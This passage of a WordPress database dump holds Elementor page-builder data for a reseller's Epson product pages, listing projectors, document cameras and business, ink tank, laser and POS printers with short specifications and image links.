projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1dcee02\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-5\",\"right\":\"-5\",\"bottom\":\"-5\",\"left\":\"-5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/h4>\\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\\n<ul>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>White and Colour Brightness at 3,300lm<\\/li>\\n \\t<li>Multi-PC projection<\\/li>\\n \\t<li>HDMI Connectivity x2<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6efc9f3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/h4><br>\\n<img class=\\\"wp-image-2441 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><br>\\n\\nThe Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.\\n<ul>\\n \\t<li>White and Colour Brightness at 8,000lm<\\/li>\\n \\t<li>WUXGA (1920 x 1200)<\\/li>\\n \\t<li>Edge-blending to create large panoramic images<\\/li>\\n \\t<li>Curve and corner wall projection<\\/li>\\n \\t<li>HDBaseT<\\/li>\\n<\\/ul>\\n<div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/h4><br>\\n<img class=\\\"wp-image-2442 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><br>\\n\\nEpson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.\\n\\n<em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em>\\n<ul>\\n \\t<li>High Brightness<\\/li>\\n \\t<li>Beyond Full HD Resolution<\\/li>\\n \\t<li>Powered Lens<\\/li>\\n \\t<li>Portrait Projection<\\/li>\\n \\t<li>Flexible Installation<\\/li>\\n \\t<li>Edge Blending<\\/li>\\n \\t<li>Point Correction<\\/li>\\n<\\/ul>\\n<div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/h4><br>\\n<img class=\\\"wp-image-2443 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><br>\\n\\nDiscover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.\\n<ul>\\n \\t<li>White and Colour Brightness at 10,000\\u00a0lm<\\/li>\\n \\t<li>WUXGA resolution<\\/li>\\n \\t<li>High Reliability and Durability<\\/li>\\n \\t<li>Suitable for 24\\/7 usage<\\/li>\\n \\t<li>Flexible projection angles and installations<\\/li>\\n<\\/ul>\\n<div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(8096,3500,'_elementor_version','2.5.14'),(8654,3661,'_cover',''),(8655,3661,'_show_excerpt',''),(8099,3501,'_wp_page_template','template-fullwidth.php'),(8100,3501,'_elementor_edit_mode','builder'),(8101,3501,'_elementor_template_type','post'),(8102,3501,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><br>\\n\\nThe Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Speed: Up to 30ppm<\\/li>\\n \\t<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li>\\n \\t<li>Quality prints with new Epson Technologies<\\/li>\\n \\t<li>New print job management features<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><br>\\n\\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 35ppm<\\/li>\\n \\t<li>Auto-Duplex<\\/li>\\n \\t<li>Ethernet &amp; Epson iPrint<\\/li>\\n \\t<li>2 optional paper cassette tray<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2427 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><br><br>\\n\\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 40 ppm<\\/li>\\n \\t<li>Epson iPrint<\\/li>\\n \\t<li>Ethernet<\\/li>\\n \\t<li>4 optional cassette trays<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"75\",\"right\":\"75\",\"bottom\":\"75\",\"left\":\"75\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" 